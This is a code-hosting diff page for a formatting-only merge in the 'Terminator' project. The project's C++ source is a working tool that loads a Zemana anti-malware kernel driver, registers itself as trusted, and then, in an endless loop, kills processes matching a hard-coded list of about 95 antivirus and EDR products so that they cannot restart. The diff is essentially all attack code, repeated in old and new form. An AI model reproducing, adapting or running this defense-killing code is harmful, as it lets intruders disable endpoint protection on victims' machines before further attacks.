STRLCPY/Terminator

Merge pull request #4 from illegal-instruction-co/master

format code and adjust global and local variables name to fits camelCase

V2 committed with GitHub 11 months ago

3329775c

2 parents
c6084879
44cc1dac

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

Terminator/Terminator.cpp

1	1		#define _CRT_SECURE_NO_WARNINGS
2		-	#include <Windows.h>
	2	+
3	3		#include <iostream>
	4	+
4	5		#include <Windows.h>
5	6		#include <tlhelp32.h>
6	7
		skipped 1 lines
8	9
9	10		#define IOCTL_TERMINATE_PROCESS 0x80002048
10	11
11		-	const char* const edrlist[] = {
12		-	"activeconsole",
13		-	"anti malware",
14		-	"anti-malware",
15		-	"antimalware",
16		-	"anti virus",
17		-	"anti-virus",
18		-	"antivirus",
19		-	"appsense",
20		-	"authtap",
21		-	"avast",
22		-	"avecto",
23		-	"canary",
24		-	"carbonblack",
25		-	"carbon black",
26		-	"cb.exe",
27		-	"ciscoamp",
28		-	"cisco amp",
29		-	"countercept",
30		-	"countertack",
31		-	"cramtray",
32		-	"crssvc",
33		-	"crowdstrike",
34		-	"csagent",
35		-	"csfalcon",
36		-	"csshell",
37		-	"cybereason",
38		-	"cyclorama",
39		-	"cylance",
40		-	"cyoptics",
41		-	"cyupdate",
42		-	"cyvera",
43		-	"cyserver",
44		-	"cytray",
45		-	"darktrace",
46		-	"defendpoint",
47		-	"defender",
48		-	"eectrl",
49		-	"elastic",
50		-	"endgame",
51		-	"f-secure",
52		-	"forcepoint",
53		-	"fireeye",
54		-	"groundling",
55		-	"GRRservic",
56		-	"inspector",
57		-	"ivanti",
58		-	"kaspersky",
59		-	"lacuna",
60		-	"logrhythm",
61		-	"malware",
62		-	"mandiant",
63		-	"mcafee",
64		-	"morphisec",
65		-	"msascuil",
66		-	"msmpeng",
67		-	"nissrv",
68		-	"omni",
69		-	"omniagent",
70		-	"osquery",
71		-	"palo alto networks",
72		-	"pgeposervice",
73		-	"pgsystemtray",
74		-	"privilegeguard",
75		-	"procwall",
76		-	"protectorservic",
77		-	"qradar",
78		-	"redcloak",
79		-	"secureworks",
80		-	"securityhealthservice",
81		-	"semlaunchsv",
82		-	"sentinel",
83		-	"sepliveupdat",
84		-	"sisidsservice",
85		-	"sisipsservice",
86		-	"sisipsutil",
87		-	"smc.exe",
88		-	"smcgui",
89		-	"snac64",
90		-	"sophos",
91		-	"splunk",
92		-	"srtsp",
93		-	"symantec",
94		-	"symcorpu",
95		-	"symefasi",
96		-	"sysinternal",
97		-	"sysmon",
98		-	"tanium",
99		-	"tda.exe",
100		-	"tdawork",
101		-	"tpython",
102		-	"vectra",
103		-	"wincollect",
104		-	"windowssensor",
105		-	"wireshark",
106		-	"threat",
107		-	"xagt.exe",
108		-	"xagtnotif.exe"
109		-	};
	12	+	const char* g_serviceName = "Terminator";
110	13
111		-	int edrlist_size = sizeof(edrlist) / sizeof(edrlist[0]);
	14	+	const char* const g_edrlist[] = {
	15	+	"activeconsole", "anti malware", "anti-malware",
	16	+	"antimalware", "anti virus", "anti-virus",
	17	+	"antivirus", "appsense", "authtap",
	18	+	"avast", "avecto", "canary",
	19	+	"carbonblack", "carbon black", "cb.exe",
	20	+	"ciscoamp", "cisco amp", "countercept",
	21	+	"countertack", "cramtray", "crssvc",
	22	+	"crowdstrike", "csagent", "csfalcon",
	23	+	"csshell", "cybereason", "cyclorama",
	24	+	"cylance", "cyoptics", "cyupdate",
	25	+	"cyvera", "cyserver", "cytray",
	26	+	"darktrace", "defendpoint", "defender",
	27	+	"eectrl", "elastic", "endgame",
	28	+	"f-secure", "forcepoint", "fireeye",
	29	+	"groundling", "GRRservic", "inspector",
	30	+	"ivanti", "kaspersky", "lacuna",
	31	+	"logrhythm", "malware", "mandiant",
	32	+	"mcafee", "morphisec", "msascuil",
	33	+	"msmpeng", "nissrv", "omni",
	34	+	"omniagent", "osquery", "palo alto networks",
	35	+	"pgeposervice", "pgsystemtray", "privilegeguard",
	36	+	"procwall", "protectorservic", "qradar",
	37	+	"redcloak", "secureworks", "securityhealthservice",
	38	+	"semlaunchsv", "sentinel", "sepliveupdat",
	39	+	"sisidsservice", "sisipsservice", "sisipsutil",
	40	+	"smc.exe", "smcgui", "snac64",
	41	+	"sophos", "splunk", "srtsp",
	42	+	"symantec", "symcorpu", "symefasi",
	43	+	"sysinternal", "sysmon", "tanium",
	44	+	"tda.exe", "tdawork", "tpython",
	45	+	"vectra", "wincollect", "windowssensor",
	46	+	"wireshark", "threat", "xagt.exe",
	47	+	"xagtnotif.exe" };
112	48
	49	+	int g_edrlistSize = sizeof(g_edrlist) / sizeof(g_edrlist[0]);
113	50
	51	+	BOOL loadDriver(char* driverPath) {
	52	+	SC_HANDLE hSCM, hService;
114	53
115		-	BOOL
116		-	LoadDriver(
117		-	char* driverPath
118		-	) {
119		-	SC_HANDLE hSCM, hService;
120		-	const char* serviceName = "Terminator";
	54	+	// Open a handle to the SCM database
	55	+	hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
	56	+	if (hSCM == NULL)
	57	+	return (1);
121	58
122		-	// Open a handle to the SCM database
123		-	hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
124		-	if (hSCM == NULL) {
125		-	return (1);
126		-	}
	59	+	// Check if the service already exists
	60	+	hService = OpenServiceA(hSCM, g_serviceName, SERVICE_ALL_ACCESS);
	61	+	if (hService != NULL) {
	62	+	printf("Service already exists.\n");
127	63
128		-	// Check if the service already exists
129		-	hService = OpenServiceA(hSCM, serviceName, SERVICE_ALL_ACCESS);
130		-	if (hService != NULL)
131		-	{
132		-	printf("Service already exists.\n");
	64	+	// Start the service if it"s not running
	65	+	SERVICE_STATUS serviceStatus;
	66	+	if (!QueryServiceStatus(hService, &serviceStatus)) {
	67	+	CloseServiceHandle(hService);
	68	+	CloseServiceHandle(hSCM);
	69	+	return (1);
	70	+	}
133	71
134		-	// Start the service if it"s not running
135		-	SERVICE_STATUS serviceStatus;
136		-	if (!QueryServiceStatus(hService, &serviceStatus))
137		-	{
138		-	CloseServiceHandle(hService);
139		-	CloseServiceHandle(hSCM);
140		-	return (1);
141		-	}
	72	+	if (serviceStatus.dwCurrentState == SERVICE_STOPPED) {
	73	+	if (!StartServiceA(hService, 0, nullptr)) {
	74	+	CloseServiceHandle(hService);
	75	+	CloseServiceHandle(hSCM);
	76	+	return (1);
	77	+	}
142	78
143		-	if (serviceStatus.dwCurrentState == SERVICE_STOPPED)
144		-	{
145		-	if (!StartServiceA(hService, 0, nullptr))
146		-	{
147		-	CloseServiceHandle(hService);
148		-	CloseServiceHandle(hSCM);
149		-	return (1);
150		-	}
	79	+	printf("Starting service...\n");
	80	+	}
151	81
152		-	printf("Starting service...\n");
153		-	}
	82	+	CloseServiceHandle(hService);
	83	+	CloseServiceHandle(hSCM);
	84	+	return (0);
	85	+	}
154	86
155		-	CloseServiceHandle(hService);
156		-	CloseServiceHandle(hSCM);
157		-	return (0);
158		-	}
	87	+	// Create the service
	88	+	hService = CreateServiceA(hSCM, g_serviceName, g_serviceName, SERVICE_ALL_ACCESS,
	89	+	SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
	90	+	SERVICE_ERROR_IGNORE, driverPath, NULL, NULL, NULL,
	91	+	NULL, NULL);
159	92
160		-	// Create the service
161		-	hService = CreateServiceA(
162		-	hSCM,
163		-	serviceName,
164		-	serviceName,
165		-	SERVICE_ALL_ACCESS,
166		-	SERVICE_KERNEL_DRIVER,
167		-	SERVICE_DEMAND_START,
168		-	SERVICE_ERROR_IGNORE,
169		-	driverPath,
170		-	NULL,
171		-	NULL,
172		-	NULL,
173		-	NULL,
174		-	NULL
175		-	);
	93	+	if (hService == NULL) {
	94	+	CloseServiceHandle(hSCM);
	95	+	return (1);
	96	+	}
176	97
177		-	if (hService == NULL) {
178		-	CloseServiceHandle(hSCM);
179		-	return (1);
180		-	}
	98	+	printf("Service created successfully.\n");
181	99
182		-	printf("Service created successfully.\n");
	100	+	// Start the service
	101	+	if (!StartServiceA(hService, 0, nullptr)) {
	102	+	CloseServiceHandle(hService);
	103	+	CloseServiceHandle(hSCM);
	104	+	return (1);
	105	+	}
183	106
184		-	// Start the service
185		-	if (!StartServiceA(hService, 0, nullptr))
186		-	{
187		-	CloseServiceHandle(hService);
188		-	CloseServiceHandle(hSCM);
189		-	return (1);
190		-	}
191		-
192		-	printf("Starting service...\n");
	107	+	printf("Starting service...\n");
193	108
194		-	CloseServiceHandle(hService);
195		-	CloseServiceHandle(hSCM);
	109	+	CloseServiceHandle(hService);
	110	+	CloseServiceHandle(hSCM);
196	111
197		-	return (0);
	112	+	return (0);
198	113		}
199	114
200		-	char*
201		-	to_lowercase(
202		-	const char* str
203		-	)
204		-	{
205		-	char* lower_str = _strdup(str);
206		-	for (int i = 0; lower_str[i]; i++)
207		-	{
208		-	lower_str[i] = tolower((unsigned char)lower_str[i]);
209		-	}
210		-	return lower_str;
	115	+	char* toLowercase(const char* str) {
	116	+	char* lower_str = _strdup(str);
	117	+	for (int i = 0; lower_str[i]; i++) {
	118	+	lower_str[i] = tolower((unsigned char)lower_str[i]);
	119	+	}
	120	+	return lower_str;
211	121		}
212	122
213		-	int
214		-	is_in_edrlist(
215		-	const char* pn
216		-	)
217		-	{
218		-	char* tempv = to_lowercase(pn);
219		-	for (int i = 0; i < edrlist_size; i++)
220		-	{
221		-	if (strstr(tempv, edrlist[i]) != NULL)
222		-	{
223		-	free(tempv);
224		-	return (1);
225		-	}
226		-	}
227		-	free(tempv);
228		-	return (0);
	123	+	int isInEdrlist(const char* pn) {
	124	+	char* tempv = toLowercase(pn);
	125	+	for (int i = 0; i < g_edrlistSize; i++) {
	126	+	if (strstr(tempv, g_edrlist[i]) != NULL) {
	127	+	free(tempv);
	128	+	return (1);
	129	+	}
	130	+	}
	131	+	free(tempv);
	132	+	return (0);
229	133		}
230	134
231	135		DWORD
232		-	check_EDR_Processes
233		-	(
234		-	HANDLE hDevice
235		-	) {
236		-	unsigned int procId = 0;
237		-	unsigned int pOutbuff = 0;
238		-	DWORD bytesRet = 0;
239		-	int ecount = 0;
240		-	HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	136	+	checkEDRProcesses(HANDLE hDevice) {
	137	+	unsigned int procId = 0;
	138	+	unsigned int pOutbuff = 0;
	139	+	DWORD bytesRet = 0;
	140	+	int ecount = 0;
	141	+	HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
241	142
242		-	if (hSnap != INVALID_HANDLE_VALUE)
243		-	{
244		-	PROCESSENTRY32 pE;
245		-	pE.dwSize = sizeof(pE);
	143	+	if (hSnap != INVALID_HANDLE_VALUE) {
	144	+	PROCESSENTRY32 pE;
	145	+	pE.dwSize = sizeof(pE);
246	146
247		-	if (Process32First(hSnap, &pE))
248		-	{
249		-	do
250		-	{
251		-	char exeName[MAX_PATH];
252		-	wcstombs(exeName, pE.szExeFile, MAX_PATH);
	147	+	if (Process32First(hSnap, &pE)) {
	148	+	do {
	149	+	char exeName[MAX_PATH];
	150	+	wcstombs(exeName, pE.szExeFile, MAX_PATH);
253	151
254		-	if (is_in_edrlist(exeName))
255		-	{
256		-	procId = (unsigned int)pE.th32ProcessID;
257		-	if (!DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &procId, sizeof(procId), &pOutbuff, sizeof(pOutbuff), &bytesRet, NULL))
258		-	printf("faild to terminate %ws !!\n", pE.szExeFile);
259		-	else
260		-	{
261		-	printf("terminated %ws\n", pE.szExeFile);
262		-	ecount++;
263		-	}
264		-	}
265		-	} while (Process32Next(hSnap, &pE));
266		-	}
267		-	CloseHandle(hSnap);
268		-	}
269		-	return (ecount);
	152	+	if (isInEdrlist(exeName)) {
	153	+	procId = (unsigned int)pE.th32ProcessID;
	154	+	if (!DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &procId,
	155	+	sizeof(procId), &pOutbuff, sizeof(pOutbuff),
	156	+	&bytesRet, NULL))
	157	+	printf("faild to terminate %ws !!\n", pE.szExeFile);
	158	+	else {
	159	+	printf("terminated %ws\n", pE.szExeFile);
	160	+	ecount++;
	161	+	}
	162	+	}
	163	+	} while (Process32Next(hSnap, &pE));
	164	+	}
	165	+	CloseHandle(hSnap);
	166	+	}
	167	+	return (ecount);
270	168		}
271	169
272		-	int
273		-	main(
274		-	void
275		-	) {
	170	+	int main(void) {
	171	+	WIN32_FIND_DATAA fileData;
	172	+	HANDLE hFind;
	173	+	char FullDriverPath[MAX_PATH];
	174	+	BOOL once = 1;
276	175
277		-	WIN32_FIND_DATAA fileData;
278		-	HANDLE hFind;
279		-	char FullDriverPath[MAX_PATH];
280		-	BOOL once = 1;
	176	+	hFind = FindFirstFileA("Terminator.sys", &fileData);
281	177
282		-	hFind = FindFirstFileA("Terminator.sys", &fileData);
283		-
284		-	if (hFind != INVALID_HANDLE_VALUE) { // file is found
285		-	if (GetFullPathNameA(fileData.cFileName, MAX_PATH, FullDriverPath, NULL) != 0) { // full path is found
286		-	printf("driver path: %s\n", FullDriverPath);
287		-	}
288		-	else {
289		-	printf("path not found !!\n");
290		-	return(-1);
291		-	}
292		-	}
293		-	else {
294		-	printf("driver not found !!\n");
295		-	return(-1);
296		-	}
297		-	printf("Loading %s driver .. \n", fileData.cFileName);
298		-
299		-	if (LoadDriver(FullDriverPath))
300		-	{
301		-	printf("faild to load driver ,try to run the program as administrator!!\n");
302		-	return (-1);
303		-	}
304		-
305		-	printf("driver loaded successfully !!\n");
	178	+	if (hFind != INVALID_HANDLE_VALUE) { // file is found
	179	+	if (GetFullPathNameA(fileData.cFileName, MAX_PATH, FullDriverPath, NULL) !=
	180	+	0) { // full path is found
	181	+	printf("driver path: %s\n", FullDriverPath);
	182	+	}
	183	+	else {
	184	+	printf("path not found !!\n");
	185	+	return (-1);
	186	+	}
	187	+	}
	188	+	else {
	189	+	printf("driver not found !!\n");
	190	+	return (-1);
	191	+	}
	192	+	printf("Loading %s driver .. \n", fileData.cFileName);
306	193
307		-	HANDLE hDevice = CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_WRITE \| GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	194	+	if (loadDriver(FullDriverPath)) {
	195	+	printf("faild to load driver ,try to run the program as administrator!!\n");
	196	+	return (-1);
	197	+	}
308	198
309		-	if (hDevice == INVALID_HANDLE_VALUE) {
310		-	printf("Failed to open handle to driver !! ");
311		-	return (-1);
312		-	}
	199	+	printf("driver loaded successfully !!\n");
313	200
314		-	unsigned int input = GetCurrentProcessId();
	201	+	HANDLE hDevice =
	202	+	CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_WRITE \| GENERIC_READ, 0,
	203	+	NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
315	204
316		-	if (!DeviceIoControl(hDevice, IOCTL_REGISTER_PROCESS, &input, sizeof(input), NULL, 0, NULL, NULL))
317		-	{
318		-	printf("Failed to register the process in the trusted list %X !!\n", IOCTL_REGISTER_PROCESS);
319		-	return (-1);
320		-	}
	205	+	if (hDevice == INVALID_HANDLE_VALUE) {
	206	+	printf("Failed to open handle to driver !! ");
	207	+	return (-1);
	208	+	}
321	209
322		-	printf("process registed in the trusted list %X !!\n", IOCTL_REGISTER_PROCESS);
	210	+	unsigned int input = GetCurrentProcessId();
323	211
	212	+	if (!DeviceIoControl(hDevice, IOCTL_REGISTER_PROCESS, &input, sizeof(input),
	213	+	NULL, 0, NULL, NULL)) {
	214	+	printf("Failed to register the process in the trusted list %X !!\n",
	215	+	IOCTL_REGISTER_PROCESS);
	216	+	return (-1);
	217	+	}
324	218
325		-	printf("Terminating ALL EDR/XDR/AVs ..\nkeep the program running to prevent windows service from restarting them\n");
	219	+	printf("process registed in the trusted list %X !!\n",
	220	+	IOCTL_REGISTER_PROCESS);
326	221
	222	+	printf(
	223	+	"Terminating ALL EDR/XDR/AVs ..\nkeep the program running to prevent "
	224	+	"windows service from restarting them\n");
327	225
328		-	while (0x1)
329		-	{
330		-	if (!check_EDR_Processes(hDevice))
331		-	Sleep(1200);
332		-	else
333		-	Sleep(700);
334		-	}
	226	+	for (;;) {
	227	+	if (!checkEDRProcesses(hDevice))
	228	+	Sleep(1200);
	229	+	else
	230	+	Sleep(700);
	231	+	}
335	232
336		-	system("pause");
	233	+	system("pause");
337	234
338		-	CloseHandle(hDevice);
	235	+	CloseHandle(hDevice);
339	236
340		-	return 0;
	237	+	return 0;
341	238		}
342	239